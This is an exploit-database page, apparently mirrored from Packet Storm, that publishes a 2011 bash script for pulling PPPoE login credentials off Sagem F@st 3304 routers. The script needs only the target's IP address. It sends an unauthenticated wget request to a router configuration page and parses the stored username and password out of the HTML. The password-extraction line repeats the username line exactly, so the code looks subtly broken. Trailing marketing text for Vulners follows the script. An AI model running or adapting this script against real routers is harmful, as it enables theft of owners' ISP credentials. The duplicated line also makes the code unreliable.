Lucene search
K

Sagem 3304 Router PPPOE Password Retrieval

🗓️ 27 Jul 2011 00:00:00Reported by Security TrackerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Sagem 3304 Router PPPOE Password Retrieval via Exploit Script

Code
`#!/bin/bash  
#########################################  
# Exploit Title: Sagem 3304 Routers Get PPPOE Password  
# Date 27/07/2011  
# Author: [email protected]  
# Software Link: null  
# Version: Sagem Routers F@st 3304  
# Tested on: Sagem F@ST 3304  
#  
#########################################  
  
  
Usage()  
{  
echo "Usage : $0 IP_ADDRESS"  
}  
if [ "$1" != "" ]  
then  
IP_ADDRESS="$1"  
else  
Usage  
exit 1  
fi  
  
USER_NAME=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `  
  
USER_PASSWORD=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `  
  
echo "Username = $USER_NAME ; Passsword = $USER_PASSWORD"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation